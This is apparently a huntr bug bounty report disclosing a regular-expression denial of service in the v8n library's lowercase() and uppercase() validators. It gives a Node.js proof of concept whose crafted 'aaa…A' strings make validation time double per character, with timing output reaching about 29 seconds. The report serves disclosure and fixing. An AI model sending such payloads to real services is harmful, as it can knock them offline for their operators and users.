huntr report 2D92F644-593B-43B4-BFD1-C8042AC60609 (reporter: vovikhangcdv)
History: Jun 29, 2022 - 6:40 a.m.

Inefficient Regular Expression Complexity potentially leads to Denial of Service in

2022-06-29 06:40:14
vovikhangcdv
www.huntr.dev
inefficient regular expression
denial of service
exploitable code
performance issue
dos attack
bug bounty
regex complexity

EPSS

0.001

Percentile

50.0%

Description

The regular expressions behind lowercase() and uppercase() have inefficient (super-linear) complexity, so a crafted input can cause a denial of service. With a payload of the form 'a' + 'a'.repeat(i) + 'A', a string of only 32 characters took 29443 ms to evaluate with lowercase(), and the execution time roughly doubles with each additional character. uppercase() is affected in the same way.

Proof of Concept

// PoC.js
// Run with: node PoC.js (v8n must be installed first: npm install v8n)
const v8n = require('v8n')

// Each iteration adds one more 'a' before the trailing 'A'. The 'A' makes the
// anchored match fail, so the engine backtracks through every way of splitting
// the run of 'a's and the time roughly doubles per character. The loop bound
// is the original PoC's; in practice the run becomes unusable long before
// i reaches 1000.
for (let i = 1; i <= 1000; i++) {
    const start = Date.now()
    const attack_str = 'a' + 'a'.repeat(i) + 'A'
    v8n().lowercase().test(attack_str)    // uppercase() is affected the same way
    const time_cost = Date.now() - start
    console.log('attack_str.length: ' + attack_str.length + ': ' + time_cost + ' ms')
}

Output

attack_str.length: 26: 434 ms
attack_str.length: 27: 868 ms
attack_str.length: 28: 1876 ms
attack_str.length: 29: 3641 ms
attack_str.length: 30: 7899 ms
attack_str.length: 31: 14900 ms
attack_str.length: 32: 29443 ms

